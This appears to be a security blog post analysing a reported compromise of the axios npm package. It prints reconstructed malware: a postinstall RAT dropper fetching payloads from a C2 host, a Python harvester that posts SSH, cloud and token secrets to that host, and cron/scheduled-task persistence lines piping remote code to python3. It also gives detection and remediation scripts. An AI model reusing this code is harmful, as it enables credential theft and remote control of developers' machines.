Axios npm Package Under Siege:
The 100M Developer Supply Chain Attack 💥

Before we dive into the attack, let's understand what makes axios so critical — and why this attack was so devastating. 🎯

Why Developers Love Axios

// Without axios - verbose and error-prone
const response = await fetch('/api/users');
if (!response.ok) throw new Error('Request failed');
const data = await response.json();

// With axios - clean and simple ✨
const { data } = await axios.get('/api/users');

Axios handles timeouts, retries, request/response interceptors, automatic JSON transformation, and cross-browser compatibility. It's trusted infrastructure that "just works" — which is exactly why attackers targeted it. 💡

On March 30, 2026, security researchers at StepSecurity discovered something alarming: two malicious versions of axios had been published to npm. This wasn't a typosquatting attack or a dependency confusion issue — this was the real axios package, published by a compromised maintainer account. 😱

The Attack Flow

Why This Attack Was Sophisticated

Unlike typical npm malware that relies on typos or newly created packages, this attack demonstrated advanced planning and operational security: 🔍

• 🎯 Pre-staged malicious dependency: The attacker published plain-crypto-js@4.2.1 to npm 18 hours before the axios releases, avoiding "brand-new package" alarms from security scanners
• 🔄 Dual-branch targeting: Both the 1.x and 0.x release branches were poisoned within 39 minutes, maximizing exposure to different project versions
• ⚡ Bypassed CI/CD: Published directly via npm CLI using compromised credentials, completely bypassing the project's normal GitHub Actions pipeline and code review process
• 🕵️ Email hijacking: The attacker changed the maintainer's account email to an anonymous ProtonMail address, preventing legitimate recovery attempts
• 🧹 Self-cleaning malware: After execution, the malware deleted itself and replaced its package.json with a clean version to evade forensic detection

Let's walk through exactly what happened, minute by minute. The attacker's careful timing reveals a sophisticated operation: ⏱️

Let's break down the technical mechanics of this attack. Understanding the "how" is crucial for preventing future incidents. 🔬

Step 1: Dependency Injection

The attacker modified axios's package.json to add a new dependency that was never imported anywhere in the code. This is the red flag that security scanners eventually caught: 🚩

{
  "name": "axios",
  "version": "1.14.1",
  "dependencies": {
    "follow-redirects": "^1.15.6",
    "form-data": "^4.0.0",
    "proxy-from-env": "^1.1.0",
    "plain-crypto-js": "^4.2.1"  // 💥 MALICIOUS!
  }
}

Step 2: The Postinstall Script

When you run npm install axios@1.14.1, npm automatically runs postinstall scripts for all dependencies. The malicious plain-crypto-js@4.2.1 package.json contained: ⚙️

{
  "name": "plain-crypto-js",
  "version": "4.2.1",
  "scripts": {
    "postinstall": "node index.js"  // 💥 Runs automatically!
  }
}

The index.js file contained obfuscated JavaScript that acted as a cross-platform RAT dropper. Here's a simplified version of what it did: 🕵️

const os = require('os');
const https = require('https');
const exec = require('child_process').exec;

// Detect operating system
const platform = os.platform();

// Command & Control server
const C2_SERVER = 'https://sfrclak.com:8000';

// Download and execute platform-specific payload
if (platform === 'darwin') {
  // macOS: Download RAT binary to system cache
  downloadAndExecute(`${C2_SERVER}/macos-rat`, '/Library/Caches/com.apple.act.mond');
} else if (platform === 'win32') {
  // Windows: Copy PowerShell to hidden location and run malicious script
  exec('copy C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe %PROGRAMDATA%\\wt.exe');
  downloadAndExecute(`${C2_SERVER}/windows-rat.ps1`, '%PROGRAMDATA%\\update.ps1');
} else if (platform === 'linux') {
  // Linux: Download Python-based RAT
  downloadAndExecute(`${C2_SERVER}/linux-rat.py`, '/tmp/ld.py');
}

// Self-destruct: Delete malware and replace package.json with clean version
setTimeout(() => {
  cleanupAndHide();
}, 5000);

Step 3: Platform-Specific Payloads

The attacker pre-built three different RAT payloads optimized for each operating system: 🖥️

What the RAT Targeted

The malware was specifically designed to steal developer credentials and secrets: 🔐

• SSH Keys: ~/.ssh/id_rsa, id_ed25519 — access to production servers
• AWS Credentials: ~/.aws/credentials — cloud infrastructure access
• Docker Credentials: ~/.docker/config.json — container registry access
• Kubernetes Config: ~/.kube/config — cluster access
• Git Credentials: ~/.gitconfig, ~/.git-credentials — source code access
• NPM Tokens: ~/.npmrc — package publishing rights
• Environment Variables: API keys, database passwords, tokens
• Browser Cookies: Session tokens for GitHub, AWS Console, etc.

Let's analyze what the malware actually does once it's on your machine. Understanding the RAT's behavior is key to detecting and removing it. 🔬

Phase 1: Initial Infection (0-5 seconds)

Phase 2: Credential Harvesting (5-60 seconds)

The RAT systematically scans for developer secrets: 🕵️

import os
import json
import base64
import requests

HOME = os.path.expanduser('~')
C2_UPLOAD = 'https://sfrclak.com:8000/upload'

# Target credential locations
TARGETS = [
    f'{HOME}/.ssh/id_rsa',
    f'{HOME}/.ssh/id_ed25519',
    f'{HOME}/.aws/credentials',
    f'{HOME}/.kube/config',
    f'{HOME}/.docker/config.json',
    f'{HOME}/.npmrc',
    f'{HOME}/.gitconfig',
    f'{HOME}/.git-credentials'
]

def harvest_credentials():
    stolen_data = {}

    # Read credential files
    for target in TARGETS:
        if os.path.exists(target):
            with open(target, 'r') as f:
                stolen_data[target] = f.read()

    # Extract environment variables
    env_secrets = {
        k: v for k, v in os.environ.items()
        if any(keyword in k.upper()
                for keyword in ['TOKEN', 'KEY', 'SECRET', 'PASSWORD', 'API'])
    }
    stolen_data['env'] = env_secrets

    # Exfiltrate to C2 server
    payload = base64.b64encode(json.dumps(stolen_data).encode())
    requests.post(C2_UPLOAD, data={'data': payload})

# Execute harvesting
harvest_credentials()

Phase 3: Persistence & C2 Communication

The RAT establishes persistence to survive reboots and maintains a backdoor connection: 🔗

#!/bin/bash
# Add hidden cron job that re-downloads RAT every hour

(crontab -l 2>/dev/null; echo "@hourly /bin/bash -c 'curl -s https://sfrclak.com:8000/linux-rat.py | python3 -'") | crontab -

# Create scheduled task that runs on startup and every 2 hours
$Action = New-ScheduledTaskAction -Execute '%PROGRAMDATA%\wt.exe' -Argument '-File %PROGRAMDATA%\update.ps1 -WindowStyle Hidden'
$Trigger = New-ScheduledTaskTrigger -AtStartup
$Settings = New-ScheduledTaskSettingsSet -Hidden
Register-ScheduledTask -TaskName "WindowsUpdateCheck" -Action $Action -Trigger $Trigger -Settings $Settings

The attack was discovered by StepSecurity's automated supply chain monitoring system approximately 3 hours after the first malicious version was published. Here's how: 🔍

Detection Method 1: Suspicious Dependency Addition

Security scanners flagged an unusual pattern: a new dependency was added to axios that was never imported in the codebase. This is a classic indicator of supply chain compromise: 🚩

// Simplified detection logic
function detectSuspiciousDependency(packageName, version) {
  const pkgJson = fetchPackageJson(packageName, version);
  const sourceFiles = fetchSourceCode(packageName, version);

  for (const dep of pkgJson.dependencies) {
    const isImported = sourceFiles.some(file =>
      file.includes(`require('${dep}')`) ||
      file.includes(`import ... from '${dep}'`)
    );

    if (!isImported) {
      // 🚨 Red flag: dependency never used!
      alert(`Suspicious unused dependency detected: ${dep}`);
    }
  }
}

// Triggered alert for plain-crypto-js
detectSuspiciousDependency('axios', '1.14.1');
// 🚨 Alert: plain-crypto-js is listed but never imported!

Detection Method 2: Bypassed CI/CD Pipeline

Legitimate axios releases always go through GitHub Actions and are published by the CI bot. These versions were published directly via npm publish using personal credentials — another red flag: 🔴

Detection Method 3: Rapid Version Succession

Two major versions (1.14.1 and 0.30.4) were published within 39 minutes, both with the same suspicious dependency pattern. This rapid, coordinated release across branches triggered anomaly detection: ⚡

Once the attack was detected, a coordinated response from the security community, npm, and the axios maintainers worked to contain the damage: 🛡️

Immediate Actions Taken

Remediation Steps for Affected Users

If you installed axios@1.14.1 or axios@0.30.4, you need to take immediate action: 🚨

Detection Script

Run this script to check if you have the malicious versions installed: 🔍

#!/bin/bash
# Check if malicious axios versions are installed

echo "🔍 Checking for malicious axios versions..."

if npm list axios | grep -E "1.14.1|0.30.4"; then
    echo "🚨 ALERT: Malicious axios version detected!"
    echo "⚠️  You must take immediate action:"
    echo "   1. Upgrade: npm install axios@latest"
    echo "   2. Rotate all credentials"
    echo "   3. Scan for RAT malware"
else
    echo "✅ No malicious axios versions found."
fi

# Check for RAT artifacts
echo ""
echo "🔍 Checking for RAT artifacts..."

if [[ "$(uname)" == "Darwin" ]]; then
    [[ -f "/Library/Caches/com.apple.act.mond" ]] && echo "🚨 RAT detected: /Library/Caches/com.apple.act.mond"
elif [[ "$(uname)" == "Linux" ]]; then
    [[ -f "/tmp/ld.py" ]] && echo "🚨 RAT detected: /tmp/ld.py"
    crontab -l | grep -q "sfrclak.com" && echo "🚨 Malicious cron job detected"
fi

This attack exposes critical vulnerabilities in the npm ecosystem and software supply chains. Here's what we learned and how to protect ourselves: 💡

🎯 Key Lessons Learned

🛡️ npm Security Best Practices Checklist

🚀 Tools & Resources

• Socket.dev — Real-time supply chain security monitoring
• Snyk — Vulnerability scanning and dependency monitoring
• StepSecurity — GitHub Actions security hardening
• npm audit — Built-in vulnerability scanner
• Dependabot — Automated dependency updates and alerts
• Sigstore — Software signing and provenance verification

🔒 Security Advisories & Analysis

• StepSecurity: axios Compromised on npm - Malicious Versions Drop Remote Access Trojan
• Socket.dev: Supply Chain Attack on Axios Pulls Malicious Dependency
• Aikido: axios compromised on npm - maintainer account hijacked, RAT deployed
• The Hacker News: Axios Supply Chain Attack Pushes Cross-Platform RAT via Compromised npm Account
• Snyk: Axios npm Package Compromised - Supply Chain Attack Delivers Cross-Platform RAT
• Wiz: Axios NPM Distribution Compromised in Supply Chain Attack

📰 News Coverage

• iTnews: Supply chain attack hits 300 million-download Axios npm package
• Techzine: Axios npm package compromised, posing a new supply chain threat
• Cybersecurity News: Axios NPM Packages Compromised to Inject With Malicious Codes
• Security Online: Axios Under Siege - Critical npm Supply Chain Attack

🛡️ Security Best Practices

• npm: About Two-Factor Authentication
• GitHub: Security hardening with OpenID Connect
• npm: Generating provenance statements
• Socket.dev: Supply chain security for npm

🧰 Tools & Resources

• StepSecurity: Secure GitHub Actions
• Snyk: Developer security platform
• Dependabot: Automated dependency updates
• Sigstore: Software signing and transparency

Found this helpful? Share it! 🚀